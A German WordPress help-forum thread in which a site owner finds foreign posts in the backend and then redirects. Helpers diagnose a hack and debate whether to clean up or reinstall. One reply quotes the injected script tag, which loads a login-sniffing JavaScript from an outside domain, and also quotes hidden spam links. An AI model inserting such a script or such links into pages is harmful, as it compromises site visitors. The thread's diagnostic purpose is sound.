Fremde Seiten im Backend

  • Hallo Leute,
    ich habe seid Wochen damit zu tun das sich irgendwelche Leute das Recht rausnehmen in meinem Backend Beiträge zu erstellen und zu veröffentlichen.

    Was kann ich dagegen unternehmen. Plugins wie Sucuri Security und WPS Hide Login helfen nicht .
    Es hilft auch nicht eine zweites Login mit Password in der .htaccess anzulegen.
    Ich habe immer wieder Fremde Beiträge im Backend.

    Google ist ziemlich voll mit ähnlichen Themen aber leider steht da auch nur das was man überall liest und das funktioniert leider nicht.

    Hat noch einer einen Tipp für mich,der auch was bewirkt ?

    Meine Webseite ist https://toyota.corolla-verso-hilfe.de/

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Was meinst Du mit "Beiträgen" genau? Geht es tatsächlich um Beiträge oder meinst Du andere Einträge? Sind diese auch öffentlich zu sehen, wenn ja wo?

    Ich sehe du hast eine extrem alte Wordpress-Version mit 4.9.20. Was ist der Grund wieso du dort bleibst?
    Sind alle von dir genutzten Plugins auf dem aktuellstens Stand? Hast Du auch mal kontrolliert, ob die von dir genutzten Plugins überhaupt noch vom Hersteller mit Updates versorgt werden? Wenn nicht könnten diese veralteten Plugins ein Einfallstor für Angreifer sein.

    • Welche genauen Seiten und/oder Beiträge wurden dort erstellt? Von welchem WordPress Benutzer? Screenshots?
    • Mehrere "Sicherheits" Plugins mit ähnlicher Zielrichtung gleichzeitig zu betreiben, funktioniert oft nicht, da sie sich in die Quere kommen können.


    Tipp am Rande: Über die WordPress Suche mit "login" findet man bei Dir eine Login Seite, die aber derzeit nicht funktioniert ist, da das ProfilePress Plugin offenbar inaktiv ist.

  • So hier mal so eine Seite die ständig in die Beiträge gestellt wird.
    https://corolla-verso-hilfe.de/blog/2021/08/1…otta-na-foreks/
    Sorry, das hier ist die Hautseite und da läuft ein WP 5.9.2.
    Das andere ist eine Subdomain, da läuft ClassicPress , ja ich weiß das das alte Versionen sind. Aber da geht ja auch keiner dran.
    Aber mit dem Müll habe ich mich täglich rum zu ärgern.

    Ich lösche den Müll gleich immer. Und nein meine Login Daten sind keinem bekannt und wurden auch schon mehrfach geändert.
    Meine Plugins sind auch alle aktuell und werden auch unterstützt.
    Wie also kann irgendeiner einfach Beiträge bei mir erstellen und veröffentlichen ?

  • Dieser Beitrag wurde von einem Nutzer namens "tanne" erstellt. Das ist aktuell der einzige Nutzer neben dem Admin "cv_schrauber". Hast Du von dem auch die Zugangsdaten mal geändert? Soll es ihn überhaupt geben?

    Ggfs. wäre es auch sinnvoll die Logfiles zu prüfen zu den Zeiten wo solche Beiträge gepostet werden. Dadurch solltest Du das Einfallstor entdecken können.

    Übrigens kommt beim Aufruf der Seite immer eine Passwort-Abfrage, weil du den /wp-admin/-Bereich offenbar damit schützt und auch das Frontend einige URLs von dort lädt.

  • Ich bedanke mich für die Zahlreichen Denkanstöße und mögliche Ursachen. Ich werde mich damit natürlich befassen.
    Wenn ich nicht weiterkomme hoffe ich auf weitere Hilfe. Vielen Dank bis hier hin. Ich werde berichten ob das was gebracht hat.

    Zitat

    Übrigens kommt beim Aufruf der Seite immer eine Passwort-Abfrage, weil du den /wp-admin/-Bereich offenbar damit schützt und auch das Frontend einige URLs von dort lädt.


    Wie kann ich das ändern ?

    Zitat

    Und wenn du die XML rpc Schnittstelle nicht nutzt, solltest du diese auch deaktivieren


    Nein die nutze ich nicht, wenn ich ehrlich bin habe ich da auch keine Ahnung von.

    Zitat

    Hast Du von dem auch die Zugangsdaten mal geändert?


    Ja ich habe das mal geändert, habe den User aber stehen gelassen. Meine Passwörter haben in der Regel min. 40 Zeichen und mehr.Wer setzt sich da hin und versucht das zu knacken. Oder stehen die PW auch noch in Echt in einer Datei.?

    Ich muss mal sagen ,ich war viele Jahr bei Lima-City,da hatte ich so etwas nie. Jetzt bin ich etwas mehr als 6 Monate bei Dogado und habe nur Ärger.

    Eins noch, bitte.
    Ich bekomme im Benutzer Bereich diese Meldung.

    Zitat

    Deine Website scheint die Basis-Authentifizierung zu verwenden, die derzeit nicht mit den Anwendungspasswörtern kompatibel ist.

    Was muss ich tun um das zu ändern.

    Ich habe noch ein Forum auf der gleichen Plattform, das scheint keinen zu interessieren, man gut auch.
    https://verso-forum.de


  • Wie kann ich das ändern ?

    Indem Du den zusätzlichen Zugriffschutz für den Adminbereich entfernst, wie auch immer Du den gesetzt hast.

    Zitat

    Was muss ich tun um das zu ändern.

    Wie von @Michi91 geschrieben die xmlrpc-Schnittstelle einschränken. Schau dir den o.g. Link dazu an. Geht übrigens auch mit diesem Plugin: https://wordpress.org/plugins/disable-xml-rpc/ - und auch mit zahlreichen Sicherheitsplugins wie iThemeSecurity und WordFence.

  • So, ich habe das jetzt mit der xml_rpc_Schnittstelle geändert . Das sieht jetzt so aus.

  • So, wie es scheint hat sich das Problem erledigt.

    Doch jetzt habe ich eine neues Problem. Meine Seite https://corolla-verso-hilfe.de wird einfach weitergeleitet auf Seiten die ich nicht kenne.
    Wie und wo finde ich den Befehl zur Weiterleitung.
    Das muss ja in irgendeiner Datei nachträglich rein geschrieben sein.

    Ich habe mir schon die eine oder auch andere Datei angeschaut, aber leider ohne Erfolg.
    Vielleicht wisst ihr ja, wo man so einen Befehl einträgt das er nicht gefunden wird.

  • Die Seite ist aktuell gehackt. Ganz zu Beginn des HTML Quelltextes wird ein bösartiges JavaScript (Virustotal.com) eingebunden, das den Login belauscht und dann ggf. auch z.B. auf andere Seiten weiterleitet:

    HTML
    <script src='https://print.legendarytable.com/news.js?v=6.3.2' type='text/javascript'></script><!DOCTYPE html>
    <html dir="ltr" lang="de-DE"
        prefix="og: https://ogp.me/ns#" >
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="profile" href="http://gmpg.org/xfn/11">
    ...


    Ganz am Ende des HTML Quelltextes werden Spam Links eingefügt:

    Code
    ...
    <span style="display:block; font-size:0;height:0;">Charr vs. Oquendo canceled with deal unsigned <a href="http://uk-roids.com/" title="buy anabolic steroids uk online">buy anabolic steroids uk online</a> cash flow on steroids: why companies cheat
    </span></body>
    </html>


    Von weiterem Befall an anderen Stellen ist auszugehen.

    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben, das könntest Du mit jemandem mit WordPress Erfahrung bei Dir im näheren Umfeld zusammen durchgehen.

    Dabei am Wichtigsten wäre, die für den Hack genutzte(n) Lücke(n) zu ermitteln, damit das nicht wieder passiert.

    6 Mal editiert, zuletzt von b3317133 (8. April 2022 um 16:44)

  • Na toll das sind ja Aussichten, Wie kann man dann so etwas verhindern ?
    Leider habe ich keinen mit WP Erfahrung hier,ich habe mich bis jetzt mit viel lesen durchgeschlagen.
    In welcher Datei ist denn der Müll zu finden, ich bekomme das mit den Hinweisen schon raus.
    Ich komme nur noch über den FTP an die Seite,alles andere geht heute nicht mehr.

  • Na toll das sind ja Aussichten, Wie kann man dann so etwas verhindern ?
    Leider habe ich keinen mit WP Erfahrung hier,ich habe mich bis jetzt mit viel lesen durchgeschlagen.
    In welcher Datei ist denn der Müll zu finden, ich bekomme das mit den Hinweisen schon raus.
    Ich komme nur noch über den FTP an die Seite,alles andere geht heute nicht mehr.

    Es gibt richtiges Managed WordPress. Da kümmern sich Profis um dein WordPress, damit genau sowas nicht passiert.

    Kostet nur ein paar Euros mehr als das klassiche Webhosting.

    IONOS, Strato und Co. bieten zwar auch ein Produkt "Managed WordPress" an, dies ist allerdings nur Marketing. Da ist nichts managed.

  • Also ist für mich der einfachste Weg ein Backup zurück zu schreiben oder eine Neuinstallation.
    Ich habe erst die Probleme als ich meinen Hoster gewechselt habe. Vorher hatte ich so etwas nie. Mein WP hat sich ja auch nicht geändert nur der Hoster. Also was bleibt über ?

    In welcher Datei steht denn bitte dieser Müll ? Den bekomme ich da schon raus. Wenn das alles ist, oder gibt es da noch mehr stellen ?

    1. Am Wichtigsten wäre es, zunächst anhand der aktuell verseuchten Dateien, Datenbank und Server-Logs die für den/die Hack(s) genutzte(n) Lücke(n) zu ermitteln, damit das nicht wieder passiert.
    2. Danach kann man entweder zusammen mit jemandem mit WordPress Erfahrung, die über das Installieren von "Sicherheits-Plugins" und dem Anklicken von Updates hinaus geht, die aktuelle Installation bereinigen oder unter Berücksichtigung der Erkenntnisse aus 1., also dem Weglassen von Theme, Plugins, externe Einbindungen, wasauchimmer die Lücke war, die Seite mit einem frischen WordPress neu aufbauen und die alten Beiträge/Seiten manuell direkt aus der Datenbank auslesen und unter eingehender Prüfung der Inhalte in die neue Seite einpflegen. Erneutes Aufrufen oder Einloggen in die alte gehackte Seite darf dabei nicht mehr möglich sein.


    Siehe auch allgemeines Vorgehen bei einem Hack oben verlinkt.

  • Ein gehacktes Wordpress solltest Du gar nicht erst versuchen zu bereinigen. Du weißt nie wo sich überall etwas eingenistet hat, auch weißt Du nicht wo das Einfallstor war und wer aktuell überhaupt noch Kontrolle über die Webseite hat. Wer seine Webseite gehackt vorfindet sollte diese sofort abschalten und löschen. Wer das nicht macht gefährdet potentielle Besucher der Webseite was sich im schlimmsten Fall auch rechtlich negativ auswirken kann. Anschließend kann man ein Backup verwenden um sie wiederherzustellen und die wiederhergestellte Webseite mit allen ausstehenden Updates versorgen und die Sicherheit erhöhen. Ist kein Backup vorhanden bleibt nur eine Neuinstallation übrig.

    Erst danach sollte man sich an eine Analyse wagen was passiert ist um eine Wiederholung davon zu verhindern. Dieser Schritt darf einfach nie der erste Schritt sein.

    All das hättest Du seit deiner Feststellung gestern bereits vornehmen können. Je länger du zögerst umso mehr gefährdest Du die Besucher deiner Webseite, u.a. auch jeden der deinen Link hier aufruft.

  • Jemand mit entsprechender WordPress Erfahrung kann selbstverständlich herausfinden, was sich wo eingenistet hat. Die Fähigkeit, Veränderungen gleichwelcher Art herausfinden zu können, wird jederzeit für jeden Website benötigt. Das ist eine elementare Grundlage.

    Oft werden für Hacks Lücken in Themes/Plugins genutzt, für die es keine ausstehenden Updates (mehr) gibt. Nur weil keine Updates angezeigt werden, heisst das nicht, dass man ein aktuelles und sicheres System betreibt, das ist ein weit verbreiteter Trugschluss. Daher ist eine eingehende Analyse nötig. Alles andere ist halbherzig und nicht seriös.

    Und natürlich ist die aktuelle Seite bei Bekanntwerden eines Hacks sofort abzuschalten:

    Erneutes Aufrufen oder Einloggen in die alte gehackte Seite darf dabei nicht mehr möglich sein.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!